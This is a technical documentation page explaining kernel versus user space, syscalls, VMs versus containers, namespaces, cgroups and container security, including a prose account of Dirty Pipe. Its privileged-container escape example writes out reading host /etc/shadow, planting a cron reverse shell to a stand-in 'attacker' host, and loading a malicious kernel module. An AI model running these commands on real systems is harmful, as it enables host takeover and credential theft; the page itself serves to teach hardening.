Kernel Space and User Space in Virtualization and Containers¶

Audience: Developers with basic Linux knowledge who want to understand how process isolation really works — from CPU privilege rings down to what happens when a containerized process makes a system call.

Modern operating systems split memory and execution into two distinct domains: kernel space and user space. This boundary is one of the most fundamental concepts in systems programming, and understanding it is essential for reasoning about how virtual machines, containers, and tools like Docker or containerd actually provide (or fail to provide) isolation. This page walks from first principles — CPU rings, context switches, system calls — through to the concrete security implications of sharing a kernel across dozens of containers.

Table of Contents¶

Definitions
How It Works in a Traditional OS
Virtualization: VMs vs Containers
Containers Deep Dive
Practical Examples
Comparison Table
Further Reading
Summary

1. Definitions¶

Kernel Space¶

Kernel space is the region of virtual memory reserved for the operating system kernel and its extensions (drivers, kernel modules). Code running here executes at the highest privilege level and has unrestricted access to:

All physical and virtual memory
All CPU instructions, including privileged ones (lgdt, in/out, wrmsr, etc.)
All hardware devices
Every process's address space

The kernel itself — the scheduler, memory manager, VFS layer, network stack, device drivers — all live here.

User Space¶

User space is everything else: applications, daemons, libraries, language runtimes. User-space processes run in an isolated virtual address space and cannot directly access hardware or kernel memory. Any operation that requires elevated privilege — opening a file, allocating memory, sending a packet — must be requested from the kernel via a system call.

Why the Separation Exists¶

The separation is a deliberate security and stability boundary:

Concern	Without separation	With separation
Stability	A buggy app could corrupt kernel memory	A crashing process is killed; kernel is unaffected
Security	Any process could read any other process's memory	Processes are isolated in separate virtual address spaces
Integrity	Malicious code could overwrite interrupt handlers	Kernel code is protected from unprivileged writes

The boundary is enforced by hardware — not just by software convention.

2. How It Works in a Traditional OS¶

CPU Privilege Rings¶

x86/x64 CPUs implement four privilege rings (Ring 0–3), though mainstream operating systems use only two:

┌─────────────────────────────────────────┐
│             Ring 0 (Kernel)             │  ← Full hardware access
│  ┌───────────────────────────────────┐  │
│  │          Ring 3 (User)            │  │  ← Restricted, isolated
│  │   Applications & Libraries        │  │
│  └───────────────────────────────────┘  │
└─────────────────────────────────────────┘

Ring 0 — the kernel runs here. Can execute any instruction.
Ring 3 — user processes run here. Attempting a privileged instruction causes a CPU exception (General Protection Fault), which the kernel handles — usually by killing the offending process.

Rings 1 and 2 were intended for device drivers but are unused on Linux and Windows; drivers run in Ring 0.

System Calls¶

A system call (syscall) is the controlled gateway from user space into kernel space. The kernel exposes a stable ABI of ~300–400 syscalls on Linux (read, write, open, fork, mmap, socket, etc.).

The flow for a simple read() call:

User Process (Ring 3)
       │
       │  1. Calls read(fd, buf, n) in libc
       │
       │  2. libc sets up registers:
       │     rax = syscall number (0 = sys_read)
       │     rdi = fd, rsi = buf ptr, rdx = n
       │
       │  3. Executes `syscall` instruction
       ▼
  ────────────── privilege boundary ──────────────
       │
       │  4. CPU switches to Ring 0, saves user state
       │
       │  5. Kernel's syscall handler dispatches to sys_read()
       │
       │  6. Kernel copies data from file into buf
       │
       │  7. Returns to user space (Ring 3), restores state
       ▼
User Process resumes with return value in rax

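This transition (saving registers, switching privilege levels, executing kernel code, and returning) is a mode switch between privilege domains. It is often loosely called a context switch, but a true context switch replaces the running process, whereas here the same process simply continues in kernel mode. A minimal syscall round trip costs on the order of tens to hundreds of nanoseconds on modern hardware, depending on the CPU and on enabled mitigations such as kernel page-table isolation.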
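The numbered flow above can be reproduced from user space. The sketch below assumes Linux on x86-64 or aarch64 and a libc that exports the generic syscall() wrapper; it bypasses libc's read() wrapper and supplies the syscall number itself. The helper names raw_read and demo are illustrative, not part of any library.

```python
import ctypes
import os
import platform

# read(2) syscall numbers per architecture (x86-64 matches "rax = 0" above).
SYS_READ = {"x86_64": 0, "aarch64": 63}


def raw_read(fd: int, n: int) -> bytes:
    """Read up to n bytes from fd by invoking read(2) via libc's syscall()."""
    nr = SYS_READ.get(platform.machine())
    if platform.system() != "Linux" or nr is None:
        return os.read(fd, n)  # fallback for platforms this sketch does not cover
    libc = ctypes.CDLL(None, use_errno=True)
    libc.syscall.restype = ctypes.c_long
    buf = ctypes.create_string_buffer(n)
    got = libc.syscall(ctypes.c_long(nr), ctypes.c_int(fd), buf, ctypes.c_size_t(n))
    if got < 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err))
    return buf.raw[:got]


def demo() -> bytes:
    """Write into a pipe, then read it back through the raw syscall path."""
    r, w = os.pipe()
    try:
        os.write(w, b"hello kernel")
        return raw_read(r, 64)
    finally:
        os.close(r)
        os.close(w)


if __name__ == "__main__":
    print(demo())
```

Running the same script under strace should show the read(2) call regardless of whether it was issued through the wrapper or through syscall().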

The Virtual Address Space¶

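Each user-space process has its own virtual address space (typically 128 TiB of user-addressable range on x86-64 Linux with 4-level paging). The upper half of the address space is reserved for the kernel and is not accessible from Ring 3: the page tables mark those pages supervisor-only, so the hardware rejects any Ring 3 read or write. Traditionally the whole kernel was mapped into every process; since the Meltdown mitigations (kernel page-table isolation), affected CPUs keep only a minimal entry/exit stub mapped while user code runs.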

Virtual Address Space of a single process:
┌──────────────────────────────┐  0xFFFF_FFFF_FFFF_FFFF
│         Kernel Space         │  ← mapped but not accessible
│   (same physical pages for   │    from user space (Ring 3)
│    all processes)            │
├──────────────────────────────┤  0xFFFF_8000_0000_0000 (on x86-64)
│                              │
│         User Space           │  ← fully accessible from Ring 3
│   Stack | Heap | .text | ... │
│                              │
└──────────────────────────────┘  0x0000_0000_0000_0000
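The layout in the diagram can be checked against a live process. The following is a minimal sketch, assuming Linux with procfs mounted and the 128 TiB user range of 4-level paging on x86-64; parse_maps_line and half are hypothetical helper names. It classifies each mapping in /proc/self/maps by which half of the address space it starts in.

```python
import os

USER_HALF_END = 1 << 47  # 128 TiB, assuming 4-level paging on x86-64


def parse_maps_line(line: str):
    """Return (start, end, name) for one line of /proc/<pid>/maps."""
    fields = line.split(None, 5)  # the sixth field (path) may contain spaces
    start_s, end_s = fields[0].split("-")
    name = fields[5].strip() if len(fields) > 5 else "[anonymous]"
    return int(start_s, 16), int(end_s, 16), name


def half(start: int) -> str:
    """Say which half of the address space a mapping starts in."""
    return "user" if start < USER_HALF_END else "kernel"


if __name__ == "__main__" and os.path.exists("/proc/self/maps"):
    with open("/proc/self/maps") as f:
        for line in f:
            start, end, name = parse_maps_line(line)
            print(f"{start:#018x}-{end:#018x} {half(start):6} {name}")
```

On x86-64 the only entry likely to land in the upper half is the legacy [vsyscall] page, if the kernel has it enabled; everything the process can actually touch sits in the lower half.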

3. Virtualization: VMs vs Containers¶

The kernel/user-space model becomes more interesting in virtualized environments, because the relationship is no longer one kernel to one user space: virtual machines run several kernels on one machine, while containers run several isolated user spaces on one kernel.

Virtual Machines (Full Virtualization)¶

A hypervisor (KVM, VMware ESXi, Hyper-V) sits between the hardware and one or more guest OSes. Each VM runs a complete OS with its own kernel.

┌─────────────────────────────────────────────────────────┐
│                     Host OS / Hypervisor                │
│ ┌──────────────────────────┐ ┌──────────────────────────┐│
│ │         VM 1             │ │         VM 2             ││
│ │  ┌────────────────────┐  │ │  ┌────────────────────┐  ││
│ │  │  Guest User Space  │  │ │  │  Guest User Space  │  ││
│ │  │   (apps, libs)     │  │ │  │   (apps, libs)     │  ││
│ │  ├────────────────────┤  │ │  ├────────────────────┤  ││
│ │  │  Guest Kernel      │  │ │  │  Guest Kernel      │  ││
│ │  │  (isolated)        │  │ │  │  (isolated)        │  ││
│ │  └────────────────────┘  │ │  └────────────────────┘  ││
│ └──────────────────────────┘ └──────────────────────────┘│
│              ↕ Hypervisor (virtualises hardware)         │
│                     Physical Hardware                    │
└─────────────────────────────────────────────────────────┘

Key properties:

Full kernel isolation: a kernel bug in VM1 does not affect VM2.
Syscalls stay within the guest kernel: they never reach the host kernel directly.
Higher overhead: each VM boots a full OS; memory footprint is in the GB range.

Containers (OS-Level Virtualization)¶

Containers use Linux kernel features (namespaces and cgroups) to partition a single running kernel into isolated views. There is no guest kernel.

┌─────────────────────────────────────────────────────────┐
│                      Host OS                            │
│ ┌──────────────────────────┐ ┌──────────────────────────┐│
│ │      Container A         │ │      Container B         ││
│ │  ┌────────────────────┐  │ │  ┌────────────────────┐  ││
│ │  │  User Space        │  │ │  │  User Space        │  ││
│ │  │  (nginx, libc,     │  │ │  │  (python, libs,    │  ││
│ │  │   overlay FS)      │  │ │  │   overlay FS)      │  ││
│ │  └────────┬───────────┘  │ │  └────────┬───────────┘  ││
│ └───────────│──────────────┘ └───────────│──────────────┘│
│             └─────────────┬──────────────┘               │
│                    ┌──────▼──────┐                       │
│                    │ Host Kernel │  ← SHARED             │
│                    │  (syscalls, │                       │
│                    │  namespaces,│                       │
│                    │  cgroups)   │                       │
│                    └─────────────┘                       │
│                    Physical Hardware                     │
└─────────────────────────────────────────────────────────┘

Key properties:

Shared kernel: all containers call into the same kernel.
Lower overhead: containers start in milliseconds; overhead is in the MB range.
Weaker isolation: the shared kernel is both the isolation mechanism and the attack surface.

4. Containers Deep Dive¶

The Linux Primitives: Namespaces and cgroups¶

Containers are not a single kernel feature — they are a composition of several:

Feature	What it isolates
`pid` namespace	Process ID space — PID 1 in a container is not the host's init
`net` namespace	Network interfaces, routing tables, firewall rules
`mnt` namespace	Mount points and filesystem hierarchy
`uts` namespace	Hostname and NIS domain name
`ipc` namespace	System V IPC objects (message queues, semaphores, shared memory) and POSIX message queues
`user` namespace	UID/GID mappings (root in container ≠ root on host, optionally)
`cgroup` namespace	View of cgroup hierarchy
cgroups v2	Resource limits: CPU, memory, I/O, PIDs

These namespaces give each container a virtualised view of the system, but all system calls still reach the same host kernel.
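Namespace membership is visible from user space through the symlinks under /proc/<pid>/ns. The sketch below assumes Linux with procfs mounted; list_namespaces and shared_namespaces are illustrative helper names. Two processes are in the same namespace exactly when the corresponding links carry the same identifier.

```python
import os


def list_namespaces(pid="self"):
    """Map namespace name -> identifier such as 'pid:[4026531836]'."""
    ns_dir = f"/proc/{pid}/ns"
    result = {}
    for name in sorted(os.listdir(ns_dir)):
        try:
            result[name] = os.readlink(os.path.join(ns_dir, name))
        except OSError:
            result[name] = "(unreadable)"  # e.g. another user's process
    return result


def shared_namespaces(a, b):
    """Names of namespaces whose identifiers match in both mappings."""
    return sorted(
        n for n in a
        if n in b and a[n] == b[n] and a[n] != "(unreadable)"
    )


if __name__ == "__main__" and os.path.isdir("/proc/self/ns"):
    for name, ident in list_namespaces().items():
        print(f"{name:20} {ident}")
```

Comparing the output for a host shell with the output for a containerized process (given permission to read its /proc entry) shows which namespaces the runtime actually unshared.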

What Runs in User Space Per Container¶

Each container has its own isolated user space containing:

Root filesystem — typically an OCI image layer stack (e.g., alpine:3.19 + your app layer), mounted via overlayfs. This provides a private /bin, /lib, /etc, etc.
Processes — each container has its own PID namespace; the first process is PID 1 inside the container.
Libraries — libc, language runtimes, and dependencies come from the container image, not the host.
Environment — its own hostname, network interfaces, and mount tree.
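Whether a process is running on an overlayfs root, as described in the list above, can be inferred from its mount table. This is a small sketch that assumes the /proc/mounts text format (device, mount point, filesystem type, options, dump, pass); root_fs_type is a hypothetical helper and the sample text in the usage note is invented for illustration.

```python
def root_fs_type(mounts_text: str):
    """Return the filesystem type mounted at '/', or None if not listed."""
    fs_type = None
    for line in mounts_text.splitlines():
        fields = line.split()
        # Columns: device, mount point, fs type, options, dump, pass
        if len(fields) >= 3 and fields[1] == "/":
            fs_type = fields[2]  # a later entry for the same mount point wins
    return fs_type


if __name__ == "__main__":
    try:
        with open("/proc/mounts") as f:
            print("root filesystem type:", root_fs_type(f.read()))
    except OSError:
        print("/proc/mounts is not available on this system")
```

Inside a typical Docker or containerd container this is expected to report overlay, while on the host it usually reports the disk filesystem such as ext4 or xfs.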

Container A's user space:
/
├── bin/         ← from Alpine base image layer
├── lib/         ← libc from Alpine, NOT the host's libc
├── usr/
│   └── local/
│       └── bin/nginx   ← application layer
├── etc/
│   └── nginx/nginx.conf
├── proc/        ← virtualised via pid + mount namespace
└── sys/         ← virtualised

The kernel itself — at /proc/version, in kernel memory, in system call tables — is the host kernel and is identical for all containers.
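A quick way to observe the shared kernel is to ask for the kernel release from inside different containers. The sketch below uses only the Python standard library; kernel_release and proc_version are illustrative names. Run in an Alpine container and in an Ubuntu container on the same host, both calls are expected to report the host's kernel, not anything from the image.

```python
import platform


def kernel_release() -> str:
    """Release string of the running kernel, as reported by uname(2)."""
    return platform.release()


def proc_version():
    """Contents of /proc/version, or None when procfs is not available."""
    try:
        with open("/proc/version") as f:
            return f.read().strip()
    except OSError:
        return None


if __name__ == "__main__":
    print("uname release :", kernel_release())
    print("/proc/version :", proc_version())
```

The image determines the libc and userland tools, which is why the distribution name in /etc/os-release can differ between containers while the kernel release stays the same.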

How containerd Manages This¶

containerd is an industry-standard container runtime (used by Docker, Kubernetes, and others). Its role in the stack:

┌──────────────────────────────────┐
│  User (CLI / Kubernetes)         │
├──────────────────────────────────┤
│  containerd (container lifecycle │
│  management — image pull,        │
│  snapshot management, task API)  │
├──────────────────────────────────┤
│  runc (OCI runtime)              │
│  → calls clone(2) with CLONE_NEW*│
│    flags to create namespaces    │
│  → sets up cgroups, pivot_root   │
│  → execs container entrypoint    │
├──────────────────────────────────┤
│  Linux Kernel                    │
│  (namespaces, cgroups, overlayfs)│
└──────────────────────────────────┘

runc — the low-level OCI runtime — directly invokes syscalls like clone(2), unshare(2), pivot_root(2), and mount(2) to set up the container environment. It does not involve any virtual machine or hypervisor.
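The namespace-creation step can be tried by hand. The sketch below is not how runc is implemented; it is a minimal illustration, assuming Linux, procfs, and a kernel or sandbox policy that permits unprivileged user namespaces. It forks a child, calls unshare(2) with CLONE_NEWUSER and CLONE_NEWUTS through libc, and checks whether the child's UTS namespace identifier changed. The function name try_unshare_uts and its return strings are hypothetical.

```python
import ctypes
import os

CLONE_NEWUTS = 0x04000000   # new hostname/domain namespace
CLONE_NEWUSER = 0x10000000  # new user namespace, so no root is needed
UTS_LINK = "/proc/self/ns/uts"


def try_unshare_uts() -> str:
    """Fork a child, unshare its UTS namespace, and report what happened."""
    if not os.path.lexists(UTS_LINK):
        return "unavailable"
    before = os.readlink(UTS_LINK)
    pid = os.fork()
    if pid == 0:  # child: must never return into the caller's code
        code = 3
        try:
            libc = ctypes.CDLL(None, use_errno=True)
            if libc.unshare(CLONE_NEWUSER | CLONE_NEWUTS) != 0:
                code = 1  # refused by the kernel or by a sandbox policy
            else:
                code = 0 if os.readlink(UTS_LINK) != before else 2
        finally:
            os._exit(code)
    _, status = os.waitpid(pid, 0)
    if not os.WIFEXITED(status):
        return "error"
    outcomes = {0: "isolated", 1: "denied", 2: "unchanged"}
    return outcomes.get(os.WEXITSTATUS(status), "error")


if __name__ == "__main__":
    print(try_unshare_uts())
```

A result of "denied" is common inside containers and hardened hosts, where seccomp or sysctl settings block unprivileged namespace creation; that refusal is itself one of the mitigation layers discussed later.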

Isolation and Security Implications¶

Because every container shares the host kernel:

There is no kernel isolation. A vulnerability in the kernel is exploitable by any container.
Namespace escapes are possible. Misconfigured namespaces (e.g., a container that shares the host's pid namespace) expose host resources to the container and can undermine isolation.
Privileged containers are dangerous. Running a container with --privileged or excessive capabilities grants near-root access to the host.
The syscall surface is the attack surface. Every syscall reachable from a container is a potential exploit path into the shared kernel.

Mitigation tools (seccomp, AppArmor/SELinux, user namespaces) reduce this surface but do not eliminate it.
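Whether a seccomp filter is actually applied to a process can be read from the Seccomp field of /proc/<pid>/status. A minimal sketch, assuming that field's documented values (0 disabled, 1 strict, 2 filter); seccomp_mode is an illustrative helper name:

```python
SECCOMP_MODES = {0: "disabled", 1: "strict", 2: "filter"}


def seccomp_mode(status_text: str):
    """Return the seccomp mode named in /proc/<pid>/status text, or None."""
    for line in status_text.splitlines():
        key, _, value = line.partition(":")
        if key == "Seccomp":
            return SECCOMP_MODES.get(int(value.strip()), "unknown")
    return None  # field absent, e.g. kernel built without seccomp


if __name__ == "__main__":
    try:
        with open("/proc/self/status") as f:
            print("seccomp mode:", seccomp_mode(f.read()))
    except OSError:
        print("/proc/self/status is not available on this system")
```

A container started with a runtime's default profile would be expected to report filter, while a process on an unconfined host shell typically reports disabled.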

5. Practical Examples¶

5.1 Architecture Diagram (Mermaid)¶

graph TD
    subgraph Host["Host Machine"]
        subgraph ContainerA["Container A (nginx)"]
            A_proc["PID 1: nginx\n(user space)"]
            A_fs["overlayfs root\n/bin, /lib, /etc/nginx"]
            A_net["veth0\n172.17.0.2/16"]
        end

        subgraph ContainerB["Container B (python app)"]
            B_proc["PID 1: python\n(user space)"]
            B_fs["overlayfs root\n/bin, /lib, /app"]
            B_net["veth1\n172.17.0.3/16"]
        end

        subgraph Kernel["Host Kernel (shared)"]
            NS["Namespaces\n(pid, net, mnt, uts, ipc)"]
            CG["cgroups v2\n(CPU, memory limits)"]
            SC["Syscall Table\nsys_read, sys_write, sys_socket…"]
            NET["Network Stack\niptables / nftables"]
            FS["VFS / overlayfs"]
        end

        A_proc -->|"syscall (e.g. read, write, socket)"| SC
        B_proc -->|"syscall (e.g. read, write, socket)"| SC
        SC --> NS
        SC --> CG
        SC --> NET
        SC --> FS
    end

5.2 A System Call from Inside a Container¶

Consider a Python process inside Container B calling socket.connect(). Here is the full path from container user space to the shared kernel:

Python (user space, inside container):

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("93.184.216.34", 80))  # example.com

What happens at the kernel boundary:

// socket.connect() reaches libc's connect(), which issues the connect(2) syscall:
// rax = 42  (SYS_connect on x86-64)
// rdi = sockfd
// rsi = &sockaddr  { AF_INET, port=80, ip=93.184.216.34 }
// rdx = sizeof(sockaddr_in)
// → syscall instruction

// Inside the HOST kernel (simplified sketch of the connect path, not verbatim kernel source):
long sys_connect(int fd, struct sockaddr __user *uservaddr, int addrlen) {
    struct socket *sock = sockfd_lookup_light(fd, ...);
    // sock->ops->connect() calls the host kernel's TCP/IP stack
    // Route lookup uses Container B's network namespace (sock_net(sock->sk))
    // With Docker's default bridge network, packets leave via the veth pair and docker0
}

Key observation: the connect(2) syscall executes in the host kernel's network stack. The container's net namespace gives it an isolated view (its own routing table, its own eth0), but the code executing is the host kernel's TCP implementation — the same code serving Container A and the host itself.
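The "isolated view" is easy to see in the routing table each network namespace exposes through /proc/net/route. The sketch below assumes that file's tab-separated format and a little-endian host (addresses appear as hex integers in host byte order); default_gateway is a hypothetical helper, and the 172.17.0.1 value mentioned afterwards is only what Docker's default bridge commonly uses.

```python
import socket
import struct


def default_gateway(route_text: str):
    """Return (interface, gateway IP) of the default route, or None."""
    for line in route_text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) >= 3 and fields[1] == "00000000":
            # The hex value is the network-order address read as a native
            # integer; packing it little-endian restores the byte order.
            gateway = socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
            return fields[0], gateway
    return None


if __name__ == "__main__":
    try:
        with open("/proc/net/route") as f:
            print(default_gateway(f.read()))
    except OSError:
        print("/proc/net/route is not available on this system")
```

Inside a bridge-networked container this typically prints the container's eth0 and the bridge address (for example 172.17.0.1), while the host prints its own uplink, even though the same kernel code answers both reads.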

5.3 Security Implication: Kernel Exploit Affects All Containers¶

Scenario: Dirty Pipe (CVE-2022-0847)

In March 2022, a vulnerability was publicly disclosed in the Linux kernel's pipe subsystem (introduced in 5.8; fixed in 5.16.11, 5.15.25, and 5.10.102). It allowed an unprivileged local user to overwrite the cached contents of any file they could open for reading, including read-only files and SUID binaries.

# Inside Container A (running as non-root UID 1000)
# The attacker has no special privileges inside the container.

# 1. The exploit opens a file it can only read (for example /usr/bin/su in the
#    image's read-only layer) and uses the bug to overwrite that file's pages
#    in the kernel page cache.

# 2. The page cache belongs to the HOST KERNEL and is shared by the host and
#    all containers, so every process that reads the same underlying file,
#    including other containers built on the same image layer, sees the
#    modified contents.

# 3. Result: root inside the container, and if any host file is reachable
#    read-only from the container, a path to root ON THE HOST,
#    breaking out of Container A entirely.

Why this is different from a VM scenario:

In a VM, the guest kernel's pipe subsystem is isolated. CVE-2022-0847 in the guest kernel would give root inside the VM, but the hypervisor boundary would stop the exploit from reaching the host or other VMs. In a container environment, there is no such boundary — every container on the host was vulnerable until the host kernel was patched.
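Because the fix has to land in the host kernel, a first triage step is to compare the host's kernel release with the affected range. The sketch below is an assumption-laden heuristic, not an authoritative scanner: it uses the upstream fixed releases from the public advisory (5.16.11, 5.15.25, 5.10.102), treats every other 5.8 to 5.16 series as unfixed, and cannot see distribution backports, so a vendor kernel whose version string looks affected may already be patched. The name dirty_pipe_affected is hypothetical.

```python
import re

# First fixed upstream releases for CVE-2022-0847, per stable series.
FIXED_IN = {(5, 16): 11, (5, 15): 25, (5, 10): 102}


def dirty_pipe_affected(release: str) -> bool:
    """Guess from an upstream-style release string whether the bug is present."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor = int(m.group(1)), int(m.group(2))
    patch = int(m.group(3) or 0)
    if (major, minor) < (5, 8) or (major, minor) >= (5, 17):
        return False  # bug not yet introduced, or series released with the fix
    fixed = FIXED_IN.get((major, minor))
    return True if fixed is None else patch < fixed


if __name__ == "__main__":
    import platform
    rel = platform.release()
    print(rel, "-> possibly affected" if dirty_pipe_affected(rel) else "-> not in range")
```

Running this inside a container inspects the host kernel, since platform.release() reports the shared kernel; that is exactly why one patched host fixes every container on it.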

Mitigation layers (none are complete substitutes for patching):

# Example: seccomp profile blocking dangerous syscalls
# (Docker default profile, excerpt)
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "syscalls": [
    {
      "names": ["read", "write", "open", "close", "mmap", ...],
      "action": "SCMP_ACT_ALLOW"
    }
    # splice(2), the syscall central to Dirty Pipe, is allowed
    # by Docker's default profile — illustrating the difficulty
    # of blocking syscalls without breaking legitimate workloads.
  ]
}
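The allow-list logic of such a profile can be expressed in a few lines. This is a deliberately simplified sketch: real profiles also support argument conditions and capability-dependent rules, which are ignored here, and the PROFILE dictionary is a hypothetical, heavily shortened stand-in rather than Docker's actual default. The function name action_for is illustrative.

```python
def action_for(profile: dict, syscall: str) -> str:
    """Return the action a simplified seccomp profile assigns to a syscall."""
    for rule in profile.get("syscalls", []):
        if syscall in rule.get("names", []):
            return rule["action"]
    return profile["defaultAction"]  # anything unlisted gets the default


# Hypothetical, shortened profile in the same shape as the excerpt above.
PROFILE = {
    "defaultAction": "SCMP_ACT_ERRNO",
    "syscalls": [
        {
            "names": ["read", "write", "close", "mmap", "splice"],
            "action": "SCMP_ACT_ALLOW",
        },
    ],
}

if __name__ == "__main__":
    for name in ("read", "splice", "kexec_load"):
        print(f"{name:12} {action_for(PROFILE, name)}")
```

With splice on the allow list, the filter offers no protection against a bug reached through splice(2), which is the point the excerpt's comment makes.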

5.4 Container Escape via Privileged Mode¶

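Running a container with --privileged keeps its namespaces but removes nearly every other protection (all capabilities granted, all host devices visible, seccomp and AppArmor disabled):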

# On the host, a developer runs a "debug" container carelessly:
docker run --privileged -it ubuntu bash

# Inside the container, an attacker can:

# 1. Mount the host filesystem
mkdir /host
mount /dev/sda1 /host     # /dev/sda1 is visible because --privileged
                           # grants access to ALL host devices

# 2. Read and modify host files
cat /host/etc/shadow      # host password hashes
echo "* * * * * root bash -i >& /dev/tcp/attacker/4444 0>&1" \
  >> /host/etc/crontab    # plant a reverse shell

# 3. Load a kernel module (full kernel compromise)
insmod /malicious.ko      # arbitrary kernel code execution on the HOST

This escape works because --privileged grants every capability (including CAP_SYS_ADMIN and CAP_SYS_MODULE), exposes the host's device nodes, and disables seccomp/AppArmor, effectively giving the container access to the host kernel's full interface.
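A container's effective capabilities can be audited from the CapEff bitmask in /proc/<pid>/status. The sketch below decodes that mask for three capabilities relevant to the escape above, using their bit numbers from the kernel's capability list (CAP_NET_ADMIN 12, CAP_SYS_MODULE 16, CAP_SYS_ADMIN 21); the helper names are illustrative.

```python
CAPS_OF_INTEREST = {"CAP_NET_ADMIN": 12, "CAP_SYS_MODULE": 16, "CAP_SYS_ADMIN": 21}


def effective_caps(status_text: str) -> int:
    """Extract the CapEff bitmask from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        key, _, value = line.partition(":")
        if key == "CapEff":
            return int(value.strip(), 16)
    raise ValueError("no CapEff line found")


def risky_caps(mask: int):
    """Names of the high-risk capabilities present in the mask."""
    return sorted(
        name for name, bit in CAPS_OF_INTEREST.items() if mask & (1 << bit)
    )


if __name__ == "__main__":
    try:
        with open("/proc/self/status") as f:
            print(risky_caps(effective_caps(f.read())))
    except OSError:
        print("/proc/self/status is not available on this system")
```

An empty list is the expected result for a container running with a restricted default capability set; seeing CAP_SYS_ADMIN or CAP_SYS_MODULE suggests the container was started privileged or with extra capabilities added.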

6. Comparison Table¶

Dimension	Bare Metal	Virtual Machine	Container
Kernel	Host kernel only	Separate guest kernel per VM	Shared host kernel
Isolation level	None (single OS)	Strong (hypervisor boundary)	Moderate (namespace boundary)
Kernel sharing	N/A	No — each VM has its own	Yes — all containers on host
Attack surface	Full host	Guest kernel + hypervisor API	Host kernel syscall table
A kernel CVE affects…	The host	Only VMs running that kernel version	All containers on the host
Startup time	N/A	Seconds to minutes	Milliseconds
Memory overhead	None	~512 MB – several GB per VM	~10–50 MB per container
Filesystem isolation	None	Full (virtual disk)	overlayfs per container
Network isolation	None	Virtual NIC per VM	`net` namespace per container
Syscall path	Direct to kernel	Handled by the guest kernel; privileged operations trap to the hypervisor (VM exit)	Direct to host kernel (optionally filtered by seccomp)
Root in environment = root on host?	Yes	No (root in guest ≠ host root)	Potentially yes (without user namespaces)
Use case	Max performance, single tenant	Strong multi-tenant isolation	High-density, microservices, CI
Examples	Physical server	KVM, VMware ESXi, Hyper-V	Docker, containerd/runc, LXC, Podman

7. Further Reading¶

Linux Kernel and System Calls¶

Linux Kernel Documentation: syscalls
The Linux Programming Interface — Michael Kerrisk (definitive reference)
man 2 syscall, man 2 clone, man 7 namespaces, man 7 cgroups

Containers and Runtimes¶

OCI Runtime Specification — defines what runc implements
containerd Architecture — official docs
Containers from Scratch — Liz Rice, GOTO 2018 (excellent live demo building a container with raw Go syscalls)
Linux Namespaces — LWN series by Michael Kerrisk

Security¶

CVE-2022-0847 (Dirty Pipe) analysis — original writeup by Max Kellermann
NCC Group: Understanding and Hardening Linux Containers
gVisor — Google's user-space kernel for containers (addresses the shared-kernel problem)
Kata Containers — lightweight VMs that look like containers (hardware isolation + container UX)
seccomp-bpf — syscall filtering for containers

Tools¶

strace — trace syscalls made by a process (works inside containers)
nsenter — enter the namespaces of a running container
unshare — create new namespaces from the shell
Falco — runtime security; detects anomalous syscall behaviour in containers

8. Summary¶

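The kernel/user-space boundary is a hardware-enforced privilege separation that underpins all OS security and stability. System calls are the only crossing point that user code can invoke deliberately (interrupts and exceptions also enter the kernel, but not on request), and they are governed by CPU rings and a controlled kernel ABI.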

Virtual machines extend this model by running complete guest kernels inside a hypervisor, giving each VM its own isolated kernel. This means a kernel-level exploit in one VM stays within that VM.

Containers take a fundamentally different approach: they use Linux namespaces to create isolated views of a single running kernel, and cgroups to enforce resource limits. The kernel itself is shared. This makes containers fast and lightweight, but it means:

The kernel is the trust boundary — and it is shared by every container on the host.
A kernel vulnerability is a host-wide vulnerability — not scoped to a single container.
User space is fully isolated per container (filesystem, processes, network interfaces), but kernel space is not.

For most workloads, the container isolation model is acceptable when combined with defence-in-depth (seccomp profiles, AppArmor/SELinux policies, non-root users, minimal capabilities, image provenance). For high-security multi-tenant environments, consider gVisor (user-space kernel) or Kata Containers (lightweight VMs) to recover hardware-level isolation without sacrificing the container developer experience.

Page last updated: 2025. Kernel behaviour described targets Linux 5.15+ / 6.x LTS unless otherwise noted.